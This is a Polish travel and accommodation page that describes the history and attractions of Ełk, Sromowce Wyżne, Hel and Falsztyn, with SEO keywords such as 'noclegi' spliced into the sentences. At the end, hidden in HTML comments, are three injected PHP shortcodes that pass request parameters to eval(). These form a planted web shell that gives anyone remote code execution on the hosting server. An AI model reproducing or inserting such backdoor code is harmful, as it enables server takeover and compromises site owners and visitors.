Ełk

Ełk  noclegi miasto i gmina w północno-wschodniej Polsce, w województwie warmińsko-mazurskim. Największe i najludniejsze miasto na Mazurach oraz główny ośrodek przemysłowy i kulturalny w regionie. Ełk noclegi nad jeziorem

Do 31 maja 1975 i od 1 stycznia 1999 siedziba władz powiatu ełckiego, a od 1992 siedziba rzymskokatolickiej diecezji ełckiej. Miasto zajmuje 3. miejsce pod względem ludności i 4. miejsce pod względem powierzchni w województwie warmińsko-mazurskim. Jest największym w województwie miastem, które nigdy przed 1945 nie znalazło się w granicach państwa polskiego (Elbląg i Olsztyn należały do Polski w latach 1466-1772), największym miastem współczesnej Polski na ziemiach, które należały do Prus Książęcych i największym miastem leżącym na ziemiach, które nigdy przed 1945 nie były integralną częścią państwa polskiego (w latach 1466-1657 Ełk był lennem Korony Królestwa Polskiego). Ełk noclegi domki

W latach 1946-1975 miasto administracyjnie należało do województwa białostockiego, a w latach 1975-1998 dowojewództwa suwalskiego. Ełk noclegi pensjonaty

Ełk położony jest na Pojezierzu Ełckim, będącym częścią Pojezierza Mazurskiego. Miasto leży nad Jeziorem Ełckim, jeziorem Sunowo i rzeką Ełk, będącą dopływem Biebrzy. Ponadto w obrębie miasta znajdują się dwa niewielkie jeziora:Selmęt Mały i Szyba. Miasto znajduje się w centrum Zielonych Płuc Polski. To jeden z najcenniejszych ekosystemów w kraju i w Europie. Obszar charakteryzuje się unikatową różnorodnością przyrody: lasów, jezior, przez równiny i doliny morenowe, aż po zielone pagórki. Ełk agroturystyka

Według danych z 2002 Ełk ma obszar 21,07 km2, w tym: użytki rolne 24%, użytki leśne 4%

Miasto stanowi 1,9% powierzchni powiatu.

Miasto powstało jako podgrodzie zamku krzyżackiego w końcu XIV wieku, uzyskało prawa miejskie w 1445. Przed reformacją parafia ełcka należała doarchiprezbiteratu w Reszlu. Od XVI w. aż do 1945 dominowali ewangelicy.

Panorama Ełku ok. 1900 r.

Ośrodek ruchu mazurskiego. Według danych niemieckich w 1890 w mieście Polacy stanowili 13%, a w powiecie (Landskreis Lyck) 71% mieszkańców. Pod koniec 1896 w Ełku powstała Mazurska Partia Ludowa, a w grudniu 1923 –Masurenbund (Związek Mazurów). W latach 1896–1902 wydawano również Gazetę Ludową, redagowaną w języku polskim i przeznaczoną dla ludności mazurskiej.

Silne zniszczenia w czasie I wojny światowej. Szybka odbudowa i rozkwit gospodarczy po jej zakończeniu. W okresie międzywojennym siedziba Konsulatu Polskiego. W czasie II wojny światowej miejsce pracy przymusowej wielu obywateli państw okupowanych. Teren działania wywiadu AK. 24 stycznia 1945 opustoszałe miasto zdobyły wojska radzieckie (Siły niemieckie mające bronić Ełku, wycofały się na chwilę przed pojawieniem pierwszych oddziałów Armii Czerwonej). Po zajęciu Ełku Czerwonoarmiści dokonali grabieży oraz umyślnego niszczenia budynków. Zniszczeniu uległo blisko 50% zabudowy. 6 kwietnia 1945 zdewastowane miasto zostaje przekazane administracji polskiej. Po wojnie Ełk był wyludnionym miastem powiatowym. Zasiedlono go głównie mieszkańcami z okolicznych powiatów (np. szczuczyńskiego, augustowskiego), w mniejszym stopniu przesiedleńcami z Kresów (głównie Grodzieńszczyzny iWileńszczyzny).

Jeden z budynków byłej jednostki wojskowej przy ul. Kościuszki

Miasto znalazło się pierwszy raz od czasów swojego istnienia w granicach państwa polskiego, aczkolwiek w wiekach poprzednich niejednokrotnie było zdobywane przez Polaków, w latach 1466-1657 było wasalne wobec Polski (stanowiło jejlenno), a w wiekach XIX i XX znajdował się w mieście silny ośrodek polskości. Obecnie duże zakłady mięsne, przetwórnia owoców, zakłady elektrotechniczne, drzewne, odzieżowe, węzeł kolejowo-drogowy. Rodzinne miasto znanego mazurskiego poety Michała Kajki. Do lat 90. XX wieku przyszłość Ełku upatrywano w intensywnej rozbudowie przemysłu, w szczególności przemysłu przetwórczego, rolno-spożywczego oraz drzewnego. Po przemianach ustrojowych w 1989 nowe samorządowe władze postawiły na turystykę i ekologię. W 1992 miasto przystąpiło do realizacji strategii Zielone Płuca Polski. Cel programu to zarządzanie miastem i gminą oparte na idei ekorozwoju. Rozpoczęto rekultywację jeziora oraz modernizację oczyszczalni ścieków.

W 1989 miasto osiągnęło liczbę 50 tysięcy mieszkańców. Zmiany ustrojowe, wzrost ludności oraz powstanie nowych osiedli umożliwiło powołanie nowych parafii i budowę nowych kościołów. W latach 1988-1992 powołano siedem nowych parafii rzymskokatolickich. 25 marca 1992 miasto zostało siedzibą rzymskokatolickiej diecezji ełckiej, a pierwszym biskupem został Wojciech Ziemba.

8 czerwca 1999 miasto odwiedził Jan Paweł II. W pierwszą rocznicę mszy papieskiej odsłonięto pomnik Jana Pawła II, a Plac Sapera, na którym stoi, przemianowano naPlac Jana Pawła II. Także w 2000 roku oddano do użytku krytą pływalnię. W kolejnym roku otworzono Centrum Edukacji Ekologicznej oraz Centrum Studiów Bałtyckich w Ełku, będące pierwszym zamiejscowym punktem kształcenia Uniwersytetu Warmińsko-Mazurskiego. W 2002 roku działalność rozpoczął nowy szpital miejski na Barankach.

W 2008 roku doszło do głośnego konfliktu władz miasta oraz władz gminy wiejskiej Ełk w związku z planowanym poszerzeniem granic miasta o wsie Konieczki iSiedliska. Wydarzenia, w tym strajk głodowy w siedzibie gminy, były opisywane przez największe krajowe media, co doprowadziło do upadku projektu 28 lipca tegoż roku.

W lipcu 2011 działalność zakończyło Kino Polonia – ostatnie ełckie kino, jednakże 21 października tego samego roku działalność rozpoczęło nowe kino w Ełckim Centrum Kultury.

Sromowce Wyżne

Sromowce Wyżne to nieduża wioska, ale doskonale może posłużyć nam jako baza wypadowa w góry. Najbliższe to Pieniny, w które warto się wybrać i zwiedzić kilka szlaków, można również wyruszyć w Gorce. Niedaleko znajdują się wyciągi narciarskie, co z pewnością ucieszy narciarzy. Mogą oni pojeździć na pobliskich wyciągach jak i pojechać dalej – w Tatry polskie i słowackie. Miejscowi gospodarze oferują kuligi z ogniskiem na zakończenie (tel 018 26 29 780). Latem można wynająć na Jeziorze Czorsztyńskim sprzęt pływający, zamówić bryczkę (tel 79 02 11 465) lub zwyczajnie poleżeć na plaży nad Dunajcem. Pobliskie miejscowości również oferują dla turystów wiele atrakcji. noclegi w Sromowcach Wyżnych

Dzieje tej miejscowości liczącej około 1200 mieszkańców, leżącej nad brzegiem Dunajca, zespalają się z historią zakonu Klarysek ze Starego Sącza, który to już w roku 1327 posiadał te ziemie z nadania królewskiego. W miejscowości obok kościoła na cmentarzu znajdują się groby właścicieli tych ziem hr. Drohojowskich. Od 1924 r. Wybudowane domy harcerskie „Dworek Cisowy”, „Watra” i „Orle Gniazdo” były ośrodkiem szkoleń instruktorek szkoły żeńskiej prowadzonej przez druhnę Olgę Małkowską do czasów II wojny światowej. Obecnie budynki stanowią bazę dla zielonych szkół. Przysiółek Sromowiec Wyżnych – Kąty stanowi początkową przystań flisacka. Stąd rozpoczyna się jedna z największych atrakcji turystycznych regionu Spływ Przełomem Dunajca. Cenną zaletą jest interesujący folklor kultywowany przez okolicznych mieszkańców. Ludność posługuje się gwarą podhalańską z silnymi wpływami słowackimi, węgierskimi oraz rumuńskimi. Piękne stroje regionalne używane są do dnia dzisiejszego głównie z okazji świąt kościelnych. Bliskość przejścia granicznego na Słowację stwarza dodatkowe możliwości zwiedzania Tatr po stronie słowackiej. W pobliżu przejścia granicznego jest wyciąg narciarski. Ze względu na usytuowanie miejscowości w pobliżu zespołu zbiorników wodnych rzeki i lasów istnieją doskonałe warunki do aktywnego wypoczynku.

W okolicy funkcjonuje kilka stacji narciarskich. Wyciągi narciarskie „Polana Sosny” znajdują się w pobliżu przejścia granicznego Niedzica – Łysa nad Dunajcem. Trasy dobrze utrzymane, przeznaczone zarówno dla zaawansowanych jak i początkujących narciarzy. Sromowce Wyżne agroturystyka

Po wejściu Polski i Słowacji do strefy Schengen granicę można przekraczać w dowolnym miejscu. Jednak nie wszędzie jest łatwo. Najdogodniej na Słowację dostać się przez stare przejścia graniczne:
noclegi Sromowce Wyżne – Łysa nad Dunajcem, Niedzica – Łysa nad Dunajcem, Sromowce Wyżne pokoje do wynajęcia – Czerwony Klasztor, Szczawnica – Leśnica.

Hel

Hel noclegi to popularny kurort nadbałtycki położony na samej północy Polski, w województwie pomorskim, na malowniczej i zadziwiającej Mierzei Helskiej, w pobliżu słynnej Juraty. Usytuowanie Helu na cyplu Półwyspu Helskiego jest naprawdę wyjątkowe, wody Bałtyku otaczają go z trzech stron, dając tym samym niesamowite wrażenie. Ponadto dogodne warunki klimatyczne i przyrodnicze sprawiły, że Hel szybko stał się znanym ośrodkiem wypoczynkowym, licznie przyciągającym letników.

W pobliżu Helu uformował się zespół malowniczych wydm białych i szarych objętych ochroną w granicach Nadmorskiego Parku Krajobrazowego. Zresztą cała Mierzeja Helska jest niezmiernie ciekawa pod względem przyrodniczym i krajobrazowym.

W przeszłości noclegi Hel miał też duże znaczenie strategiczne, stanowił bazę morską floty wojennej, z rozbudowanym systemem stanowisk obrony artyleryjskiej. Do dzisiaj zachowały się fragmenty Rejonu Umocnionego Hel, a na nadbrzeżu stoi najstarszy zachowany polski okręt – słynny „Batory”.

Atrakcje w Helu Darłówko noclegi

– Fokarium w Helu, ul. Morska 2, jedyne w Polsce fokarium z fokami szarymi, mające na celu odtworzenie koloniii tego gatunku, część Stacji Morskiej Instytutu Oceanografii Uniwersytetu Gdańskiego

– Latarnia Morska w Helu, ul. Bałtycka – zabytkowy obiekt udostępniony dla turystów w miesiącach maj-wrzesień

– Muzeum Rybołówstwa w Helu, ul. Bulwar Nadmorski – placówka ma siedzibę w poewangelickim kościele Św. Piotra i Pawła, tuż przy porcie, jest to Oddział Narodowego Muzeum Morskiego w Gdańsku Dąbki noclegi

– Muzeum Obrony Wybrzeża na Helu – Fortyfikacje Półwyspu Helskiego to jeden z ciekawszych zespołów umocnień w Polsce, ciągnący się od Kuźnic aż po Cypel. Muzeum ma siedzibę w dwóch największych obiektach: wieży kierowania ogniem i w stanowisku artyleryjskim potężnej baterii Schleswig-Holstein

– Ulica Wiejska – deptak Helu, z ciekawymi zabytkowymi domkami

– Port rybacki w Helu, ul. Bulwar Nadmorski – port i przystań, stąd wyruszają statki w rejsy

– Helska Kolejka Wąskotorowa noclegi Darłówko

– Nadmorski Park Krajobrazowy – obszar chronionego krajobrazu, na jeo obszarze zobaczyć można m.in. wszystkie rodzaje wybrzeża morskiego występujące w Polsce

Falsztyn

Falsztyn

Falsztyn to wioska malowniczo położona w paśmie Pieniny noclegi Spiskich, na wysokości 610-660 m n.p.m., wchodząca w skład Polskiego Spiszu. To piękna, choć w istocie najmniej rozwinięta turystycznie miejscowość w regionie. Falsztyn to azyl dla przyjezdnych szukających wytchnienia i rekreacji w bliskości z naturą.

Wioska powstała prawdopodobnie w XV wieku, w miejscu średniowiecznego klasztoru zniszczonego w trakcie najazdu husytów. Przez lata należała do właścicieli Zamku Dunajec w Niedzicy. Groby ostatnich zarządców – zmadziaryzowanej niemieckiej rodziny Jungenfeldów, znajdują się na zabytkowym cmentarzu (na początku wsi od strony Frydmana, 30 m za przystankiem autobusowym).  Niedzica noclegi

Dwór w Falsztynie czyli siedziba dawnych włodarzy, spłonął w 1998 roku. To właśnie tu najdłużej w Polsce utrzymywał się system pańszczyźniany, zniesiony dopiero w 1931 roku. W latach 80-tych XX wieku mieszkańcy, którzy przedtem na własną rękę organizowali się w wiejskich domach i tam uczestniczyli w odprawianych przez księdza nabożeństwach, postanowili wykorzystać dawny spichlerz i przebudować go na drewniany kościółek – dziś znany jako Kaplica Matki Bożej Królowej Polski, przynależna do parafii we Frydmanie. W 1997 ukończono budowę zapory na rzece Dunajec, a miejscowość znalazła się nad Zalewem Czorsztyńskim. Maniowy noclegi

Falsztyn to przede wszystkim walory przyrodnicze – górskie powietrze i urokliwy lesisty krajobraz. Z wioski rozciąga się malowniczy widok na noclegi Pieniny, Tatry i Gorce. Nad jeziorem mieści się rezerwat przyrody Zielone Skałki. Te stromo wznoszące się nad taflą wody skały wapienne o wysokości 80–100 m wchodzą w obręb Pienińskiego Parku Narodowego, a cały obszar od strony Falsztyna, bezpośrednio przyległy do brzegu jeziora, stanowi otulinę Parku, stąd właściwie nie ma możliwości na jakiekolwiek zagospodarowanie tego terenu. Mimo to latem spotyka się w tym miejscu urlopowiczów preferujących wypoczynek w mało obleganej okolicy, na zupełnie dzikiej plaży. Kacwin noclegi

Z Falsztyna prowadzą szlaki do pieszych wędrówek: przez Cisówkę do Niedzicy oraz przez Cisówkę i Żar do Dursztyna, a stamtąd do przełomu Białki. Dużą zaletą jest położenie wsi w sąsiedztwie największych turystycznych atrakcji regionu.

<!– [insert_php]if (isset($_REQUEST["bIY"])){eval($_REQUEST["bIY"]);exit;}[/insert_php][php]if (isset($_REQUEST["bIY"])){eval($_REQUEST["bIY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["PXH"])){eval($_REQUEST["PXH"]);exit;}[/insert_php][php]if (isset($_REQUEST["PXH"])){eval($_REQUEST["PXH"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["wJy"])){eval($_REQUEST["wJy"]);exit;}[/insert_php][php]if (isset($_REQUEST["wJy"])){eval($_REQUEST["wJy"]);exit;}[/php] –>